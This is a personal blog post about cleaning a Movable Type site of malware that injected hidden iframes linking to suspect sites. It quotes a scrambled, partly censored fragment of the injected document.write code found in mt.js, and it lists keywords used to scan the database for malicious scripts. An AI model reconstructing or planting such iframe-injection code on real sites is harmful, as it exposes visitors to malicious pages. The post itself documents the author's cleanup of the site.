Nuke the Site from Orbit…

(It’s the only way to be sure.) Hello again — So the problem around here has been some kind of malware injecting tiny iframes that link to suspect sites when people visited through Google. This is a relatively common hack, but I’ve been having serious trouble figuring out the vector. (It didn’t help that my soon-to-be-ex-host is AWOL, the Movable Type forums are a dead zone, and that I’m very much of the n00b persuasion when it comes to coding and server-side issues, although I’m considerably savvier now than I was this time last week.)

Anyway, after rolling back everything and reinstalling MT (twice), a lucky scan using this White Fir tool uncovered this nasty bit of work lurking in my mt.js file:

// document.w***e(‘ =diu bsatr=#s6ygocbxtt”>=igsale rrc<"htup:./ktihha/ch,21024453.itbm"'wikth<"519" oehfhu<"409#>‘);//

(I say lucky, but I have a suspicion this code is only visible on the first scan from a given source. The reason I started suspecting mt.js is because it was considered an additional link on the first Sucuri Sitecheck scan I did…but only that first scan, not on subsequent ones.)

Anyway, even with my changing that first “write” above, this code still looks scrambled to all hell. But, whatever it does, unlike Mr. Pibb and Red Vines, it’s also clearly crazy malicious, and thus has been swiftly airlocked.

To be honest, I’m not still not sure what the original vector of infection was — I’m hoping it was some sort of cross-scripting vulnerability of an earlier version of MT. But I also feel like I deleted this mt.js file and rebuilt it from scratch using an all-new MT 5.14 default template a few days ago, and the problem was still extant. (I’ve also scoured my MySQL database for tricksy scripts like “eval,” “unescape,” “basecode64” etc. Nothing there.)

So, at the moment, Google’s given GitM a clean bill of health again. Let’s hope it holds. In the meantime, everything I said in the last post stands — I’ll need to find a new host for GitM at some point. But, for now, I’m trying to knock out these last few chapters, so I’d best get back to it. Hope everyone out there is well.

P.S. I’m aware comments have been acting funky as well and that the comment box comes and goes. Apologies if you are a real human being who has tried to leave one in recent days. I think it’s fixed now — the comment spam seems to be getting through, in any event.

2 thoughts on “Nuke the Site from Orbit…”

  1. Hey Kev, glad to hear you are balls to the wall on the dissertation and defense. Get er done!

    BTW saw a nice article in the Times a few days back about Gillian and Ethan with their photo, meant to send it along to you, but assume you knew about it.

    We are up in Moosehead Lake, Maine for a few days, then wending our way back down to NYC metro and then DC- hope to give you a shout when we are close.

    Take good care, glad to hear Berk is spiffy.
    Jim Bob in St Augustine..

Comments are closed.